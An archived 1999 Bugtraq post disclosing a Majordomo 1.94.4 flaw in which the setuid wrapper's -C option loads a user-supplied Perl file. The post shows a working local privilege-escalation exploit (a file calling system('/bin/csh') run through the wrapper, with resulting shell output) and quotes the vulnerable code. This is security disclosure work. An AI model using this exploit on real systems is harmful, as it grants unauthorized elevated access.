Bugtraq mailing list archives
$cf Security flaw
From: shevek () anarres org (Shevek)
Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT)
I can get majordomo privelidges as a user. shevek@tirin ~$ cat foo.pl system("/bin/csh"); shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl % %whoami majordom root@tirin /usr/local/majordomo# ls -ld . drwxr-x--x 6 majordom daemon 1024 Dec 2 21:49 ./ root@tirin /usr/local/majordomo# ls -l wrapper -rwsr-xr-x 1 root daemon 6630 Jul 12 11:21 wrapper* The lines in Majordomo (I found the bug by simple inspection, it's also in resend) $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf"; while ($ARGV[0]) { # parse for config file or default list if ($ARGV[0] =~ /^-C$/i) { # sendmail v8 clobbers case $cf = $ARGV[1]; shift(@ARGV); shift(@ARGV); } elsif ($ARGV[0] eq "-l") { $deflist = $ARGV[1]; shift(@ARGV); shift(@ARGV); } else { die "Unknown argument $ARGV[0]\n"; } } if (! -r $cf) { die("$cf not readable; stopped"); } require "$cf"; Am I doing something wrong, or is this a general flaw? Can I simply disable all the possible methods of setting $cf without breaking other things? I haven't had time to inspect the system at any length, I just glanced at it. I am not on any greatcircle mailing lists, I would appreciate replies to my own address if there is discussion on this subject. Majordomo version 1.94.4 Perl 5.005_03 Ta. S. -- Shevek GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+ US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+ t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y? Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.
Current thread:
- Local / Remote Remote DoS Attack in Rover POP3 Server V1.1 NT From aVirt Ussr Labs (Dec 27)
- Remote DoS/Access Attack in Internet Anywhere Mail Server(POP 3) v2.3.1 Steven Alexander (Dec 27)
- Trend Micro InterScan VirusWall SMTP bug asl () USA ALCATEL COM (Dec 27)
- L0pht Advisory: initscripts-4.48-1 RedHat Linux 6.1 Mudge (Dec 27)
- UnixWare local pis exploit Brock Tellier (Dec 27)
- Third Party Software Affected by IIS "Escape Character Parsing" V ulnerability Microsoft Product Security Response Team (Dec 28)
- majordomo local exploit Brock Tellier (Dec 28)
- $cf Security flaw Shevek (Dec 02)
- Re: majordomo local exploit Christopher Schulte (Dec 28)
- Re: majordomo local exploit Todd C. Miller (Dec 28)
- AltaVista rudi carell (Dec 29)
- Re: majordomo local exploit Taneli Huuskonen (Dec 29)
- Re: majordomo local exploit Coolio (Dec 29)
- Re: majordomo local exploit Henrik Edlund (Dec 29)
- bna,sh Loneguard (Dec 30)
- Re: majordomo local exploit Andrew Brown (Dec 30)
- Re: majordomo local exploit Henrik Nordstrom (Dec 30)
- Fix for HP-UX automountd/autofs exploit (fwd) Doug Siebert (Dec 30)